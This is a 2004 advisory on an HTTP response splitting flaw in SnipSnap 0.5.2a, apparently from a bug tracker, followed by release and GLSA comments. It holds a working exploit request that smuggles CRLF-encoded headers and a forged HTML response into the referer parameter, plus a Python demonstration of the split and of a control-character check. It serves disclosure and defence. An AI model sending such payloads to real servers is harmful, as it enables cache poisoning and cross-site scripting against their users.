ADVISORY

Author: Maestro (me!)
Date: 14-SEP-04
Vendor: SnipSnap (www.snipsnap.org)
Product: SnipSnap 0.5.2a
Product description (from vendor website): SnipSnap is a free and easy to install weblog and wiki tool written in Java.

Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

Exploit:

POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197

referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%0a%0d%0a{html}0wned!!{/html}&cancel=cancel

(replace curly braces with less-than and greater-than)

Vendor status: vendor fixed in version 1.0B1. From vendor website:

Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released
SnipSnap version 1.0b1 has just been released. This release was necessary due to the demand to get updates from 0.5.2a and a security issue known as HTTP response splitting found by someone called Maestro De-Seguridad.

--
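The advisory gives the exploit request but not what happens on the wire. The following Python script is an added illustration, not part of this bug report and not SnipSnap's code: it takes the POST body from the advisory (with the curly braces already turned into angle brackets), decodes the `referer` parameter the way a servlet container would, feeds it through an assumed handler that copies the value into a `Location` header unfiltered (the advisory only identifies the parameter, not the exact header, so the handler is a mock), and then parses the result the way a naive HTTP/1.0 client or shared cache would, showing that one request yields two responses. A hardened handler that rejects control characters is shown beside it; the vendor's actual fix in 1.0b1 is not known to us, so that check is the generic remedy rather than the upstream one.

```python
from urllib.parse import parse_qs

# Constructed from the POST body in the advisory above, with the curly
# braces already replaced by angle brackets as the advisory instructs.
EXPLOIT_BODY = (
    "referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200"
    "%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:20%0d%0a%0d%0a<html>0wned!!</html>&cancel=cancel"
)


def referer_from_body(body: str) -> str:
    """Decode the form body as a servlet container would (%0d%0a -> CR LF)."""
    return parse_qs(body, keep_blank_values=True)["referer"][0]


def vulnerable_redirect(referer: str) -> bytes:
    """Mock of the vulnerable pattern: the user-supplied value lands in a
    response header unfiltered. Assumed handler, not SnipSnap's code; the
    advisory only tells us that the 'referer' parameter was the sink."""
    return (
        "HTTP/1.0 302 Found\r\n"
        "Location: " + referer + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """Reject CR, LF and every other control character before a value is
    copied into a header. Generic remedy; the vendor's own fix is unknown."""
    return all(ord(c) >= 0x20 and ord(c) != 0x7F for c in value)


def hardened_redirect(referer: str) -> bytes:
    """Same handler with the header-injection check in front of it."""
    if not is_safe_header_value(referer):
        raise ValueError("control character in redirect target")
    return vulnerable_redirect(referer)


def split_responses(raw: bytes) -> list:
    """Parse a byte stream the way a naive HTTP/1.0 client or shared cache
    would: status line, headers, then exactly Content-Length body bytes,
    repeated until the stream stops looking like HTTP."""
    responses = []
    while True:
        end = raw.find(b"\r\n\r\n")
        if end < 0:
            break
        head = raw[:end].decode("latin-1").split("\r\n")
        status, headers = head[0], {}
        if not status.startswith("HTTP/"):
            break  # leftover bytes of the outer response, not a message
        for line in head[1:]:
            name, _, val = line.partition(":")
            headers[name.strip().lower()] = val.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        responses.append({
            "status": status,
            "headers": headers,
            "body": raw[body_start:body_start + length],
        })
        raw = raw[body_start + length:]
    return responses


if __name__ == "__main__":
    ref = referer_from_body(EXPLOIT_BODY)
    for i, r in enumerate(split_responses(vulnerable_redirect(ref)), 1):
        print(f"response {i}: {r['status']}  body={r['body']!r}")
    try:
        hardened_redirect(ref)
    except ValueError as e:
        print("hardened handler rejected it:", e)
```

The second parsed response is the attacker-controlled `200 OK` carrying `<html>0wned!!</html>`; a cache keyed on the next request in the same keep-alive connection would store that body, which is the web cache poisoning the advisory mentions. The `Connection: keep-alive` and `Content-Length: 0` lines in the injected value are what make the first, legitimate response end cleanly so the second one is read as a separate message.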
Java herd, please bump to release 1.0B1.
bumped
arches, please mark stable.
stabled
stable on ppc, x86; java and ppc removed from cc.
Ready for a GLSA decision
Yes, a GLSA is needed. lewk, the draft is yours.
glsa 200409-23